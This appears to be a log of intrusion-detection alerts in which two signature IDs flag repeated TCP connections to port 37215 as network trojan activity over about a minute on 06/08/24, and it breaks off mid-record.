          SID:2835222
          Source Port:60536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747052
          SID:2829579
          Source Port:44290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107433
          SID:2829579
          Source Port:34644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896479
          SID:2829579
          Source Port:44836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797310
          SID:2829579
          Source Port:39962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107346
          SID:2829579
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738403
          SID:2835222
          Source Port:36804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732475
          SID:2835222
          Source Port:57260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732515
          SID:2835222
          Source Port:36076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829426
          SID:2829579
          Source Port:44046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731592
          SID:2829579
          Source Port:54428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808866
          SID:2835222
          Source Port:55492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857026
          SID:2835222
          Source Port:46428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858488
          SID:2835222
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861773
          SID:2835222
          Source Port:46978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860714
          SID:2829579
          Source Port:38388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179980
          SID:2835222
          Source Port:48516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462741
          SID:2835222
          Source Port:59808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861260
          SID:2829579
          Source Port:55036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172566
          SID:2829579
          Source Port:34608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670228
          SID:2829579
          Source Port:43958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350713
          SID:2835222
          Source Port:41794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601307
          SID:2829579
          Source Port:34964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461976
          SID:2835222
          Source Port:42380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602724
          SID:2829579
          Source Port:37802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862673
          SID:2829579
          Source Port:53180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447162
          SID:2835222
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160736
          SID:2829579
          Source Port:49886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509954
          SID:2829579
          Source Port:55436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059624
          SID:2835222
          Source Port:42492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742949
          SID:2835222
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157049
          SID:2835222
          Source Port:54522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402510
          SID:2835222
          Source Port:44648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237498
          SID:2829579
          Source Port:38660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671677
          SID:2829579
          Source Port:45584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297386
          SID:2829579
          Source Port:44694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782141
          SID:2829579
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108547
          SID:2835222
          Source Port:40110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745129
          SID:2829579
          Source Port:49258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545568
          SID:2835222
          Source Port:42902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553059
          SID:2835222
          Source Port:51706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891879
          SID:2829579
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259038
          SID:2835222
          Source Port:41950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834516
          SID:2829579
          Source Port:56444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109417
          SID:2829579
          Source Port:37862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126975
          SID:2829579
          Source Port:33834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816716
          SID:2835222
          Source Port:39580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148556
          SID:2835222
          Source Port:59050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353555
          SID:2829579
          Source Port:34840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466924
          SID:2829579
          Source Port:53086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795819
          SID:2835222
          Source Port:39704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129495
          SID:2829579
          Source Port:34018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440891
          SID:2829579
          Source Port:38150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262412
          SID:2829579
          Source Port:44608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901667
          SID:2835222
          Source Port:50938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353233
          SID:2835222
          Source Port:38468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551628
          SID:2829579
          Source Port:38882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152940
          SID:2829579
          Source Port:35096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742790
          SID:2835222
          Source Port:59372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792598
          SID:2835222
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020979
          SID:2829579
          Source Port:58024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005583
          SID:2829579
          Source Port:49686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461919
          SID:2835222
          Source Port:46120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792954
          SID:2835222
          Source Port:56292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800388
          SID:2835222
          Source Port:50264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464703
          SID:2829579
          Source Port:53224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747597
          SID:2835222
          Source Port:46820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896968
          SID:2835222
          Source Port:57672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173833
          SID:2829579
          Source Port:55376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516997
          SID:2835222
          Source Port:56676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466809
          SID:2829579
          Source Port:33514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262251
          SID:2835222
          Source Port:44580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548828
          SID:2829579
          Source Port:60274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155940
          SID:2835222
          Source Port:56960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042122
          SID:2829579
          Source Port:49844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044793
          SID:2829579
          Source Port:41402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164350
          SID:2829579
          Source Port:56506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353386
          SID:2829579
          Source Port:54230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460722
          SID:2829579
          Source Port:50908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883838
          SID:2829579
          Source Port:48572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552429
          SID:2835222
          Source Port:60618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158339
          SID:2829579
          Source Port:42300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271282
          SID:2829579
          Source Port:59698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112426
          SID:2835222
          Source Port:45236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178847
          SID:2835222
          Source Port:36464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600594
          SID:2829579
          Source Port:60924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600776
          SID:2835222
          Source Port:54824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470592
          SID:2835222
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135437
          SID:2829579
          Source Port:32796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675064
          SID:2835222
          Source Port:50984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.119115
          SID:2835222
          Source Port:33558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446353
          SID:2829579
          Source Port:56516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898124
          SID:2829579
          Source Port:35334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858959
          SID:2829579
          Source Port:60868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239121
          SID:2835222
          Source Port:43586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749204
          SID:2829579
          Source Port:60456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513900
          SID:2829579
          Source Port:54548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853205
          SID:2835222
          Source Port:37090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514476
          SID:2835222
          Source Port:35624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732750
          SID:2829579
          Source Port:33566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673817
          SID:2829579
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806402
          SID:2829579
          Source Port:47806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747388
          SID:2829579
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409489
          SID:2835222
          Source Port:42290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555183
          SID:2835222
          Source Port:49950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461438
          SID:2835222
          Source Port:58190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738908
          SID:2829579
          Source Port:35328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546666
          SID:2835222
          Source Port:45294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512895
          SID:2829579
          Source Port:56410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087779
          SID:2829579
          Source Port:35026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055458
          SID:2829579
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884625
          SID:2829579
          Source Port:56890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160381
          SID:2835222
          Source Port:48416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897332
          SID:2835222
          Source Port:53142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269840
          SID:2829579
          Source Port:41024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021833
          SID:2829579
          Source Port:39742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810190
          SID:2829579
          Source Port:49764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.740988
          SID:2835222
          Source Port:55402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018457
          SID:2829579
          Source Port:45952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158051
          SID:2829579
          Source Port:48626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174083
          SID:2829579
          Source Port:44118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749047
          SID:2835222
          Source Port:46082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706087
          SID:2829579
          Source Port:36344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.118563
          SID:2829579
          Source Port:54070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471877
          SID:2829579
          Source Port:50464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395909
          SID:2829579
          Source Port:59398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731429
          SID:2835222
          Source Port:49868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262842
          SID:2835222
          Source Port:42272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891964
          SID:2829579
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732326
          SID:2835222
          Source Port:57152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912668
          SID:2829579
          Source Port:53720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705687
          SID:2829579
          Source Port:43062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174866
          SID:2835222
          Source Port:40036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172783
          SID:2829579
          Source Port:51296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854955
          SID:2829579
          Source Port:46590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739726
          SID:2829579
          Source Port:46002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239084
          SID:2835222
          Source Port:59674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043520
          SID:2829579
          Source Port:33156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812650
          SID:2835222
          Source Port:39484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667834
          SID:2829579
          Source Port:55572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151403
          SID:2829579
          Source Port:47858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730722
          SID:2829579
          Source Port:59094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911913
          SID:2835222
          Source Port:42640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.913668
          SID:2829579
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512895
          SID:2835222
          Source Port:34516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548222
          SID:2829579
          Source Port:52530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738808
          SID:2829579
          Source Port:57466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811677
          SID:2829579
          Source Port:44812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275471
          SID:2835222
          Source Port:44752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604446
          SID:2835222
          Source Port:49778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817678
          SID:2829579
          Source Port:51308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261188
          SID:2829579
          Source Port:37246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306153
          SID:2829579
          Source Port:49166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112635
          SID:2835222
          Source Port:44566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671063
          SID:2835222
          Source Port:55986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884701
          SID:2835222
          Source Port:58512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135955
          SID:2829579
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549787
          SID:2829579
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075668
          SID:2829579
          Source Port:52708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161412
          SID:2829579
          Source Port:46126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406179
          SID:2835222
          Source Port:44462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240613
          SID:2835222
          Source Port:59186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063181
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818858
          SID:2829579
          Source Port:51660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744076
          SID:2829579
          Source Port:56540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789130
          SID:2829579
          Source Port:47774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741453
          SID:2829579
          Source Port:46028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263774
          SID:2829579
          Source Port:45314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353529
          SID:2835222
          Source Port:49562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806890
          SID:2829579
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075086
          SID:2829579
          Source Port:39230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731485
          SID:2829579
          Source Port:57638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787123
          SID:2829579
          Source Port:55148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152661
          SID:2829579
          Source Port:54128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404386
          SID:2835222
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405400
          SID:2835222
          Source Port:40796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115986
          SID:2835222
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891112
          SID:2835222
          Source Port:44304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158790
          SID:2835222
          Source Port:49134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356611
          SID:2835222
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861220
          SID:2829579
          Source Port:59872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353733
          SID:2829579
          Source Port:39048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264555
          SID:2829579
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160823
          SID:2829579
          Source Port:51948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470419
          SID:2829579
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732516
          SID:2835222
          Source Port:43468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739184
          SID:2829579
          Source Port:41962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266021
          SID:2835222
          Source Port:56138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812621
          SID:2835222
          Source Port:39456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888055
          SID:2835222
          Source Port:50982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041039
          SID:2829579
          Source Port:58354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888181
          SID:2829579
          Source Port:40774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739873
          SID:2835222
          Source Port:41462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731528
          SID:2835222
          Source Port:33086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841901
          SID:2835222
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192266
          SID:2829579
          Source Port:40070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824933
          SID:2835222
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705795
          SID:2835222
          Source Port:33522
          Destination Port:37215
